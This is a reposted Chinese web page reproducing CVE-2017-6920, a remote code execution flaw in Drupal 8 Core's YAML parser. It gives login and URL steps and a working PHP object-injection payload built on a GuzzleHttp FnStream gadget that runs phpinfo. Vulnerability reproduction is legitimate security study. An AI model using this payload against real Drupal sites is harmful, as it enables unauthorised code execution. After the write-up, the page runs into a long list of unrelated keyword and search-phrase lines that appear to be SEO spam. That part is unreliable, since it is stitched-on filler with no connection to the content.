Drupal Core 8 PECL YAML 反序列化任意
发表于:2025-12-02 作者:千家信息网编辑
千家信息网最后更新 2025年12月02日,漏洞背景:2017年6月21日,Drupal官方发布了一个编号为CVE-2017- 6920 的漏洞,影响为Critical。这是Drupal Core的YAML解析器处理不当所导致的一个远程代码执行
千家信息网最后更新 2025年12月02日Drupal Core 8 PECL YAML 反序列化任意
漏洞背景:
2017年6月21日,Drupal官方发布了一个编号为CVE-2017- 6920 的漏洞,影响为Critical。这是Drupal Core的YAML解析器处理不当所导致的一个远程代码执行漏洞,影响8.x的Drupal Core。
漏洞复现:
1.打开网页先登录一个管理员账号。
2.访问 http://你的ip:8080/admin/config/development/configuration/single/import
3.然后如下图所示:第二个随便填。
poc:!php/object "O:24:\"GuzzleHttp\Psr7\FnStream\":2:{s:33:\"\0GuzzleHttp\Psr7\FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}"
4.然后执行最下面的import,会再出来个phpinto就代表成了。
漏洞
影响
不当
处理不当
代码
代表
官方
管理员
网页
背景
账号
这是
面的
处理
登录
管理
序列
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
双端怀旧服务器
电脑显示服务器打不开怎么办
抖音最火网络安全宣传视频
博雅数据库是谁做的
计算机网络安全防护系统
教育部网络安全考核管理办法
宁波管理软件开发公司
labview数据库查询
支付宝服务器怎么登录密码
sqlite怎么下载数据库
睿达互联网科技公司
小程序 服务器交互
云服务器里可以处理数据吗
海信软件开发英语面试
服务器怎么找到坏硬盘
网络安全消除混乱的办法
网络安全法经过几次审议
苹果无法与服务器建立安全
软件开发环境建设
社旗县网络安全宣传周
服务器电源老是断电保护
软件开发工程是干啥的
应声妙成软件开发
磨床cam软件开发
智能家居必须要服务器吗
网络安全员实操题
软件开发有哪些国家证书
有没有世界通用服务器
如何保证服务器安全性
临沂顺商网络技术服务有限公司
